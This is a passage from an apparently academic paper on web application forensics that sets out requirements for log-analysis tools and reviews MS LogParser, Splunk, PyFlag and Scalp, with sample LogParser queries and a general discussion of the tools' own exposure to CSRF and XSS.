important, concerning the maximal Forensics evidence collection, as already proposed. In this way of thoughts, we should explain the fact that, the utilization of new automated techniques in WAFO, is only acceptable in case of the proper training prior to their implementation in production environment. It is crucial to know the particular features of the automated tool, which should be utilized; to know the reactions of the Webapp environment as the tool is implemented to it; to know the level of transparency, concerning the distance between the raw log files data and the tool's feedback as evidence payload etc. Let's illustrate some of the fundamental requirements parameters, considering WAFO automated tools as appropriate for their enforcement in the Forensics investigation process. 4.1. Requirements for Webapp forensics tools An essential categorization of the requirements for WAFO automated tools is given by Robert Hansen in [L9]. We should designate them as tool's requirements rules( TRR), as follows: 1. an automated tool candidate for WAFO should be able to parse log files in different formats 2. it should be able to take two independent and differently formatted logs and combine them 29
  • 29. 4.Webapp Forensics tools 3. the WAFO tool must be able to normalize by time 4. it should be able to handle big log files in the range of GiB 5. it should allow utilization of regular expressions and binary logic on any observed parameter in the log file 6. the tool should be able to narrow down to a subset of logical culprits 7. the automated tool should allow implementation of white-lists 8. it should allow a probable culprits' list construction, on which basis the security investigator should be able to pivot against 9. it should be also able to maintain a list of suspicious requests, which should indicate a potential compromise 10. the WAFO tool should utilize, decoding of URL data so that, it can be searched easier in readable formate As we should experience in the further Sections of the Chapter, we should consent that, the compliance of the heretofore enumerated requirements is still unfeasible. Let's represent a short explanation of them, which should define them as an appropriate constitutive basis. No matter, if the specific tool imply all of these requirements, or not, this should support a more appropriate categorization of its skills and utilization area(s). As current Webapps require, with reasonable likelihood, more than one different Web- Servers( for example), parsing the different log formats, could be not an easy task. This is a fundamental reason to decide, whether it is more appropriate to utilize specialized tools, related to the specific log- file format, or to seek further for an application, with wide variety of supported log- data formats. Two sufficient candidates are: Microsoft IIS file format and Apache Web server log data format28. In this way of thoughts, the concern is important, stressing the fact, how to combine the raw data from such concurrent running different Web- Servers to achieve a better correlation of the evidence, provided by the proper extraction of the payload from their log data. Furthermore, to outline coincidences, we should consider proper investigation on time-stamps. A normalization on time is crucial. The matter of the current amount of collected log files is discussed enough heretofore and clearly sufficient. The aspects, explaining the utilization of Regular Expressions, should be designated as crucial too. To illustrate this, let's mention the fact, respecting the differences in the implementations of Regular Expressions on Black- Lists basis and those on White- Lists basis, which employs a further parameter in the requirements list. The white- listing utilization should concern cases, in which the traced payload should express a well-defined construction. If the observed input string differs from this limited form, it should be outlined as suspicious. Example, Regular Expressions( RegEx) for filtering of tamper data of input fields in Webapp as login-ID from an e-mail type. On the contrary, the Black- listing specifies, what kind of construct is wrong and suspicions as default. Such filters could be eluded in a simple manner by altering in an appropriate way of the injection code, so the RegEx should fail with greater likelihood to detect it properly. It is a very 28 Statistics for the utilization of the different Web- Server should be found at: http://news.netcraft.com/ 30
  • 30. 4.Webapp Forensics tools controversial task to define a Black- List RegEx, which is covering a class of malicious strings and sustain precise('fresh'). Furthermore, it is a challenge to implement a forensics tool with minimal and compact collection of malicious signature, which should be able to sustain universally valid. Probability analysis, supporting a right on time detection of malicious signature, is a further challenging topic. Moreover, it should be very useful, if the tool is expendable by the forensics investigator, in terms of the security professional is allowed to refresh and update the list of malicious payload detecting RegExes manually. In the examples in Section 3.1. and 3.2. the illustration of the importance of proper URL- Encoding is designated and requires no further discussion on it. These conclusions advocate the statement that, TRR1 up to TRR 10 are relevant and fundamentally important for proper WAFO. Let's present a couple of interesting examples of particular WAFO automated tools candidates in the next Sections 4.2. and 4.3.. As tools' requirements basis is already specified, we should classify the tools in general into Open Source and proprietary ones and describe an appropriate tuple of those accordingly. 4.2. Proprietary tools As we discuss Business related Webapps as sufficient criterion, we should describe at first the Business-to-Business implementations of WAFO automated tools. Current representatives in this class should be enumerated as follows: EnCase[L10], FTK[L11], Microsoft LogParser[L12], Splunk[L13] etc. According to the WAFO tools requirements the author of the paper deliberates the following favorites in this category, see further. Microsoft LogParser This forensics tool is developed by Gabriele Giuseppini29. A brief history of MS LogParser is given at [L15],[L16]. The application can be obtained and utilized for free, see [L12], though as [L14] Microsoft rather designate it as “skunkware” and dislike to give an official support for it. Current version of the tool is LogParser 2.2, released at 2005. An unofficial Support site, concerning the tool should be found at: www.logparser.com30. The parser includes in general the following 3 main units: an input engine, a SQL-like query engine core and an output engine. A good illustration of the tool's structure is given at [L16], see further Appendix B, Figure 19. MS LogParser utilizes support for many autonomous input file formats: IIS log files( Netmon-Capture-logs), Event log files, text files( W3C, CSV, TSV, XML etc.), Windows Registry databases, SQL Server databases, MS ISA Server log files, MS Exchange log files, SMTP protocol log files, extended W3C log files( like Firewall log files) etc. Another achievement of the tool is, it can search for specific files in the observed file system and also search for specific Active Directory objects. Furthermore, the input engine can combine payload of the different input file formats, which allows a consolidated parsing and data correlation, thus TRR 1 and TRR 2 are satisfied. Acceptable input data types are: INTEGER, STRING, TIMESTAMP, REAL, and NULL, 29 http://nl.linkedin.com/in/gabrielegiuseppini 30 Unluckily at the present moment this site seems to be down. 31
  • 31. 4.Webapp Forensics tools which satisfies TRR 3. As [L17] parsing of the input data is achieved in efficient time, which designates another positive feature of the tool. As the data is supplied to the core engine, the Forensics examiner is allowed to parse, utilizing SQL-like queries. As default, this is implemented on behalf of a standard command line console, explicitly explained in [21]. Before illustrating this via example, let's mention that, there should be unofficial front-ends providing more user-friendly GUIs, like: simpleLPview0031. However, as the domain logparser.com seems to be down at the paper's development phase, the author of the paper isn't able to utilize tests on the GUI front-end. For the reader concerned, the GUI versions of MS LogParser aren't limited to that front-end. Developers can extend the MS LogParser UI via COM- objects, see [L15], which enables the Forensics professional to extend the tool's abilities by programming custom input format plug-ins. Let's illustrate the MS LogParser syntax, see [L15]: C:Logs>logparser "SELECT * INTO EventLogsTable FROM System" -i:EVT -o:SQL -database:LogsDatabase -iCheckpoint:MyCheckpoint.lpc The following example, represents a SQL-like query, where the input file format specified by -i concerns the MS Event logs; the output format is SQL, which means the results are stored in a database and could be filtered further as appropriate. An important option is -iCheckpoint, which designates the ability for setting checkpoint on the log files and thus achieve an incremental parsing, on the observed log data, which increases the efficiency on parsing large log files and satisfies in some way the TRR 4. The next example demonstrates, see [L15]: C:>logparser "SELECT ComputerName, TimeGenerated AS LogonTime, STRCAT(STRCAT(EXTRACT_TOKEN (Strings, 1, '|'), ''), EXTRACT_TOKEN(Strings, 0, '|')) AS Username FROM SERVER01 Security WHERE EventID IN (552; 528) AND EventCategoryName = 'Logon/Logoff'" -i:EVT a simple string manipulation, which could be extended by RegExes and satisfies TRR 5, 7. Different interesting paradigms can be found at [15], [L15], [L16], [L17]. Another notable aspect of the MS LogParser is its ability to execute automated tasks. One approach is to write batch-jobs for the tool and make system scheduler entries for their automated execution, please consider [L14]. Furthermore, the examiner can utilize windows scripting on MS LogParser, as [L17]. Appendix B, Figure 20 illustrates this. The standard implementation scenario is given as follows, see [L17]: • register the LogParser.dll • create the Logparser object • define and configure the Input format object • define and configure the Output format object • specify the LogParser query • execute the query and obtain the payload This briefly introduction of the MS LogParser demonstrates its mightiness without a doubt. However, we should consider the tool as appropriate only concerning MS Windows based 31 http://www.logparser.com/simpleLPview00.zip 32
  • 32. 4.Webapp Forensics tools environments, such as .asp, .aspx, .mspx Web applications. An open question remains, regarding the proper examination of Silverlight implementations. Another possible issue could be the iCheckpoint, configuring the incremental parsing jobs. Locating the .lpc configuration file(s) could easily lead the intruder to the log files, related to the forensics jobs, which should be exploited straight ahead. Splunk This tool is developed and maintained by Splunk Inc32. It's current stable release is 4.2.2, 2011. Although the professional version of the tool is high priced, there is a test version for the limited time of 30 days and a bounded amount of parsed log files up to 500 MB. The test version can be employed for free. Furthermore, there is a community support, concerning Splunk as a mailing list and Community Wikipedia, hosted on the Splunk Inc. domain. Official support regarding Splunk documentation, version releases and FAQ/ Case studies is presented at the tool's website, which require a free registration. Another advantage of Splunk is the on-the-fly Official-/Community-IRC-Support. Next interesting feature is the users' and official professionals' uploaded Video-tutorials, demonstrating specific usage scenarios and case studies. The tool has wide OS support: Windows, Linux, Solaris, Mac OS, FreeBSD, AIX and HP-UX. Splunk can be considered as a highly hardware consuming application33. It was tested on an Intel Pentium T7700 with 3GB of RAM machine under Windows XP Professional SP3 and Ubuntu Linux 10.04 Lucid Lynx. In both of the cases the setup runs flawlessly with less additional installation effort on the user's side. After successful installation Splunk registers a new user on the host OS, which can be deactivated. The tool represents a python based application. It antes a Web server, an OpenSSL server and an OpenLDAP, which interact with the different parsers for input data. The configuration of the different Splunk elements is implemented via XML, which allows them to be userfriendly adjusted. Splunk has even greater input format support than MS LogParser, which designates the tool as not only OS independent, but also input format all-round. An interesting combination of Splunk with Nagios is discussed at [L18]. A screenshot of the official deliberated features of the tool is illustrated at Appendix B, Figure 21. These aspects relate to the TRR 1, 2, 3, 4, 5. TRR 7, 9, 10 should be tested more extensive in particular. The user interaction with Splunk is utilized via common Web-browser. The different Splunk elements are organized on a dashboard, which allows to be reordered and organized in an user- friendly manner. Let's represent more detailed the main Splunk units. Their description is based on [L19], which concerns Splunk version 3.2.6. Although after ver. 4.0 Splunk is completely rewritten, the main Business logic units sustain. In general, the idea behind this tool is not only to parse different log file formats and support different network protocols, but also to index the parsed data. Thus, the tool impersonates a valuable search engine, like those largely known nowadays on the Internet. This allows the user to accomplish more userfriendly and precise searches on specific criterion. Indeed, the query responses from the tail- dashboard are significantly fast. Intuitively, we designate the first Splunk 32 http://www.splunk.com/ 33 http://www.splunk.com/base/Documentation/latest/installation/SystemRequirements 33
  • 33. 4.Webapp Forensics tools unit- the index engine. It supports SNMP and syslog as well. Consequently to this, the second unit represents the search core engine. One can include different search operators on specific criterion like Boolean, nested, quoted, wildcards, which respects as already stated TRR 5 and 7. The third unit is the alert engine, which somehow satisfies TRR 9. The notifications can be sent via RSS, email, SNMP, or even particular Web hyperlinks. In addition to this, the fourth unit implements the reporting ability of Splunk, TRR 2 and 3. On a specific prepared dashboard the user/ forensic examiner can not only gain detailed results on the parsed payload in text formate, but also gain derived information as interactive charts and graphs, and specific formated tables according to the auditing jobs. These are well illustrated in Appendix B, Figure 22. An interesting example describes the reporting abilities of Splunk to detect JavaScript onerror entries, on behalf of user-developed json- script, see [L22]. The fifth and last unit represents the sharing engine/ feature of Splunk. This explains the strive for users' collaborative work on behalf of this tool, where as know-how exchange is encouraged. Another motivation for this unit is a distributed Splunk environment, where not only single instance of Splunk is serving the specific network. Further abilities of the forensic tool should be mentioned as: scaling the observed network and security of the parsed data. This last feature is important to be discussed more detailed. An open question remains, as denoted at MS LogParser, whether the tool is hardened enough on itself, considering the fact that, the large payload data it is not only indexed, but also userfriendly represented. As Splunk is without a doubt an interface to every log file and protocol on the observed network, it is highly likable to get this bonding point compromised. If an attacker succeeds in this matter, one can get every detail, related to the observed network represented in an userfriendly format, which disburdens the intruder to collect valuable payload data and minimizes his/ hers penetration efforts. As the Splunk front-end is represented via Web-browser, intuitively the reader concerned, can notice that, CSRF [4] and CSFU [L20] could be respectable candidates for such attacking scenarios, especially combined with DOM based XSS attacks [20], [L21], which can trigger the malicious events in the Browser engine. If such scenarios could be achieved, then Splunk could alter into a favorite jump- start platform for exploiting secured networks, instead of to be utilized as appropriate forensic investigation tool. This designates an essential aspect, concerning the future work on WAFO. We should not extend this discussion further as it goes beyond the boundaries of the present paper. Let's introduce the selected Open Source WAFO tools, as mentioned above. 4.3. Open Source tools At first let's describe PyFlag. PyFlag As at the previously described tool, there is a team behind the PyFlag development: Dr. Michael Cohen, David Collett, Gavin Jackson. The tool's name represents an abbreviation of: python based Forensic and Log Analysis GUI. PyFlag is another python implementation of forensic investigation tools, which utilizes as a Front-end for the user the common Web-browser. Current version of the 34
  • 34. 4.Webapp Forensics tools tool is pyflag-0.87-pre1, 2008. The tool is hosted at SourceForge34 and as an Open Source App it can be obtained for free under the GPL. A support site is considered to be www.pyflag.net. This domain also stores the PyFlag Wiki with presentations of the tool and video tutorials. A different advantage is the predefined for examination forensics image also hosted on the support site. This image can be employed for the purposes of training on forensic investigation. The general structure of the tool can be described as follows. The python App antes a Web Server for displaying the parsing output and further, the collected input data is stored in a MySQL server, which allows the tool to operate with large amount of log files code lines, respecting TRR 4. The IO Source engine designates the interface to the forensic images, which enable the tool to operate with large scale input file types, as Splunk. As the observed image is loaded by the Loader engine in the Virtual File System, different scanners can be utilized for gaining the forensic relevant payload from the raw data. For the reader concerned, please refer to [L26]. The main PyFlag data flow is illustrated in the next Figure 15: Figure 15: Main PyFlag data flow, as [L26] PyFlag is natively written to support Unix-like OSes. A Windows based port is currently presented on the support Web site, PyFlagWindows35. This makes the tool OS independent as well. The PyFlag developers state that, the tool is not only a forensic investigation tool, but rather a rich development framework. The tool can be used in two modes: either as a python shell, called PyFlash, or as a userfriendly Web-GUI. The installation process requires some user input; more detailed, common installation routines like: unpacking the archive to a destination on the host OS, configuring the source via ./configure on Linux systems, checking for dependency issues and utilizing the make install, are demanded. The first start of the tool requires from the forensics investigator to configure the MySQL administrative account and the Upload directory. This location is crucial for the forensics images, which should be observed. In general PyFlag represents: a Web Application forensic tool( log files) , Network forensic tool( capture images via pcap) and an OS forensic investigation tool. As we denoted in the introduction of the paper, we should only concentrate on the log files analysis by PyFlag, discerning its other features considering NFO and OSFO( Operating System Forensics). The authors of the tool encourage the forensics investigators to correlate the different evidence from WAFO, NFO and OSFO, as it was proposed already before. 34 http://sourceforge.net/ 35 http://www.pyflag.net/cgi-bin/moin.cgi/PyFlagWindows 35
  • 35. 4.Webapp Forensics tools More detailed, PyFlag supports variety of different and independent input file formats like: IIS log format, Apache log files, iptables and syslog formats, respecting TRR 1, 2 and 3. The tool supports also different kind of level of the formats customization, e.g. Apache logs can be formatted by default, or customized by the security professional. Let's explain this. After the installation is completely set up, the user can work with the Browser- Gui PyFlag environment. For analyzing a specific log file, PyFlag presents presets, which are templates, allowing to parse a collection of a specific class log files, e.g. IIS log file format. The preset controls the driver for parsing the specific log as appropriate. As standard routine for an IIS log file analysis set up is described in [22], as follows: • Select “create Log Preset” from the PyFlag “Log Analysis”- Menu • Select the “pyflag_iis_standard_log” file to test the preset against • Select “IIS” as the log driver and utilize the parsing A more extensive introduction to the WAFO utilization of the tool is presented at Linux.conf.au, 2008, please consider watching the presentation video [L23]. After the tool starts to collect payload data from the input source, the Forensics investigator can either employ pre-defined queries and thus minimize the parsing time on-the-fly, or wait for complete data collection. The data noise in the obtained collection could be also reduced via white-listing, as TRR 7. Moreover, after data is collected, the examiner can apply index searching via natural language like queries, comparatively to Splunk. These features explain the efficient searching by the PyFlag. Another interesting aspect of the tool is the implementation of GeoIP36( Apache). It can be either obtained from the Debian repository, which presents a smaller GeoIP collection, or downloaded from the GeoIP website as a complete collection. GeoIP allows to parse the IPs and Timestamps and correlate them to the origin location of the GET/POST requests in the log file. This respects TRR 3. The tool can also store the collected evidence payload in output formats like .cvs, which explains its utilization as a Front-end to other tools applied to the investigation. An illustration of the PyFlag Web-GUI is given at Appendix B, Figure 23. To conclude the tool's description, we should mention once more time the open question of possible compromising of the Web-GUI as explained at the Splunk representation. A well known attack concerning HTTP Pollution on ModSecurity37 is presented by Luca Carettoni38 in 2009, where the IDS is exploited by an XSS instead of utilizing an image upload to the system. As mentioned above this advocates the fact that, the tool should be revised for such kind of exploits and especially rechecked for possible DOM based XSS exploits, concerning its own source. Apache-scalp or Scalp! This tool should be considered as explicitly WAFO investigation tool. Scalp! is developed by Romain Gaucher and the project is hosted on code.google.com. Its current version is 0.4 rev. 28, 2008. The tool is the only one of the described above, which definitely deploys RegExes. It represents a python script, which can be run in the python console on the common OSes and makes it OS independent. The tool is published under the Apache License 2.0 and is specified for parsing especially Apache log files, which denotes its usability only on the class of these log files and does not respect TRR 1 and 2. It is tested only on a couple of MiB log files, which disrespects further 36 http://www.maxmind.com/app/mod_geoip 37 http://www.modsecurity.org/ 38 http://www.linkedin.com/in/lucacarettoni 36